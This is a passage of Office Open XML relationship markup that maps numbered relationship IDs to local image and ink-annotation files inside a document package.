Target="../media/image461.png"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink792.xml"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1911.png"/><Relationship Id="rId330" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image339.png"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink813.xml"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image510.png"/><Relationship Id="rId351" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink908.xml"/><Relationship Id="rId372" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image841.png"/><Relationship Id="rId393" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink929.xml"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink837.xml"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image770.png"/><Relationship Id="rId253" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink858.xml"/><Relationship Id="rId274" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image980.png"/><Relationship Id="rId295" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1080.png"/><Relationship Id="rId309" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1150.png"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink776.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image457.png"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink787.xml"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1411.png"/><Relationship Id="rId320" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink892.xml"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink808.xml"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3710.png"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink830.xml"/><Relationship Id="rId341" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink903.xml"/><Relationship Id="rId362" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1910.png"/><Relationship Id="rId383" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink924.xml"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink832.xml"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image720.png"/><Relationship Id="rId243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink853.xml"/><Relationship Id="rId264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image931.png"/><Relationship Id="rId285" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1030.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink766.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image452.png"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink782.xml"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image910.png"/><Relationship Id="rId310" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink887.xml"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink803.xml"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3010.png"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink825.xml"/><Relationship Id="rId331" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink898.xml"/><Relationship Id="rId352" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1410.png"/><Relationship Id="rId373" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink919.xml"/><Relationship Id="rId394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70.png"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink848.xml"/><Relationship Id="rId254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image880.png"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink777.xml"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image488.png"/><Relationship Id="rId275" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink869.xml"/><Relationship Id="rId296" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink880.xml"/><Relationship Id="rId300" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink882.xml"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink798.xml"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2510.png"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink819.xml"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image570.png"/><Relationship Id="rId321" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1212.png"/><Relationship Id="rId342" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image911.png"/><Relationship Id="rId363" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink914.xml"/><Relationship Id="rId384" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image901.png"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image620.png"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink843.xml"/><Relationship Id="rId244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image830.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink767.xml"/><Relationship Id="rId265" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink864.xml"/><Relationship Id="rId286" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink875.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink778.xml"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image462.png"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink793.xml"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2011.png"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink814.xml"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3480.png"/><Relationship Id="rId311" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1160.png"/><Relationship Id="rId332" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image410.png"/><Relationship Id="rId353" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink909.xml"/><Relationship Id="rId374" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image851.png"/><Relationship Id="rId395" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink930.xml"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink838.xml"/><Relationship Id="rId234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image780.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink764.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image458.png"/><Relationship Id="rId255" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink859.xml"/><Relationship Id="rId276" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink870.xml"/><Relationship Id="rId297" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1090.png"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink768.xml"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink788.xml"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1511.png"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink809.xml"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3810.png"/><Relationship Id="rId301" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1112.png"/><Relationship Id="rId322" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink893.xml"/><Relationship Id="rId343" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink904.xml"/><Relationship Id="rId364" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2010.png"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink831.xml"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink833.xml"/><Relationship Id="rId385" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink925.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image453.png"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image730.png"/><Relationship Id="rId245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink854.xml"/><Relationship Id="rId266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image941.png"/><Relationship Id="rId287" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1040.png"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink783.xml"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1011.png"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink804.xml"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3110.png"/><Relationship Id="rId312" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink888.xml"/><Relationship Id="rId333" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink899.xml"/><Relationship Id="rId354" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1510.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink779.xml"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink826.xml"/><Relationship Id="rId375" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink920.xml"/><Relationship Id="rId396" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image96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9.xml"/><Relationship Id="rId299" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1061.xml"/><Relationship Id="rId303" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1063.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink941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990.xml"/><Relationship Id="rId324" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1074.xml"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image520.png"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1006.xml"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1013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964.xml"/><Relationship Id="rId268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image339.png"/><Relationship Id="rId289" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1056.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink936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985.xml"/><Relationship Id="rId314" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1069.xml"/><Relationship Id="rId335" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image970.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink933.xml"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink958.xml"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1820.png"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1001.xml"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2090.png"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1029.xml"/><Relationship Id="rId258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1040.xml"/><Relationship Id="rId279" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1051.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1330.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink952.xml"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1612.png"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink980.xml"/><Relationship Id="rId290" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1410.png"/><Relationship Id="rId304" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2110.png"/><Relationship Id="rId325" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image921.png"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1770.png"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink996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024.xml"/><Relationship Id="rId248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1035.xml"/><Relationship Id="rId269" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1046.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1280.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink947.xml"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1560.png"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink975.xml"/><Relationship Id="rId280" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image911.png"/><Relationship Id="rId315" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image871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991.xml"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1920.png"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1019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942.xml"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink970.xml"/><Relationship Id="rId270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image410.png"/><Relationship Id="rId291" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1057.xml"/><Relationship Id="rId305" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1064.xml"/><Relationship Id="rId326" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1075.xml"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1440.png"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1450.png"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1670.png"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink986.xml"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1870.png"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1007.xml"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1014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937.xml"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink965.xml"/><Relationship Id="rId260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1041.xml"/><Relationship Id="rId281" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1052.xml"/><Relationship Id="rId316" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1070.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1390.png"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink959.xml"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1620.png"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink981.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink934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002.xml"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1017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030.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink932.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink945.xml"/><Relationship Id="rId250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1036.xml"/><Relationship Id="rId255" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2280.png"/><Relationship Id="rId271" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1047.xml"/><Relationship Id="rId276" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image711.png"/><Relationship Id="rId292" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1510.png"/><Relationship Id="rId297" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1060.xml"/><Relationship Id="rId306" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22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953.xml"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink954.xml"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1570.png"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink968.xml"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink976.xml"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1700.png"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink989.xml"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1900.png"/><Relationship Id="rId301" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1062.xml"/><Relationship Id="rId322" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1073.xml"/><Relationship Id="rId327" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image930.png"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1780.png"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink997.xml"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1980.png"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1010.xml"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1012.xml"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2050.png"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1025.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink940.xml"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2130.png"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1031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image" Target="../media/image294.png"/><Relationship Id="rId287" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1055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948.xml"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1520.png"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink963.xml"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1650.png"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink984.xml"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1860.png"/><Relationship Id="rId282" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1010.png"/><Relationship Id="rId312" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1068.xml"/><Relationship Id="rId317" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image881.png"/><Relationship Id="rId333" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image960.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1260.png"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink957.xml"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1512.png"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink971.xml"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1730.png"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink992.xml"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1930.png"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1005.xml"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1020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028.xml"/><Relationship Id="rId251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2260.png"/><Relationship Id="rId256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1039.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1100.png"/><Relationship Id="rId277" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1050.xml"/><Relationship Id="rId298" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1810.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink943.xml"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1600.png"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink979.xml"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1812.png"/><Relationship Id="rId272" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image512.png"/><Relationship Id="rId293" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1058.xml"/><Relationship Id="rId302" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2010.png"/><Relationship Id="rId307" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1065.xml"/><Relationship Id="rId323" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image912.png"/><Relationship Id="rId328" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1076.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1320.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink951.xml"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1460.png"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink966.xml"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1680.png"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink987.xml"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1880.png"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1000.xml"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1008.xml"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1015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023.xml"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2212.png"/><Relationship Id="rId246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1034.xml"/><Relationship Id="rId267" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1045.xml"/><Relationship Id="rId288" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1310.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink938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974.xml"/><Relationship Id="rId262" 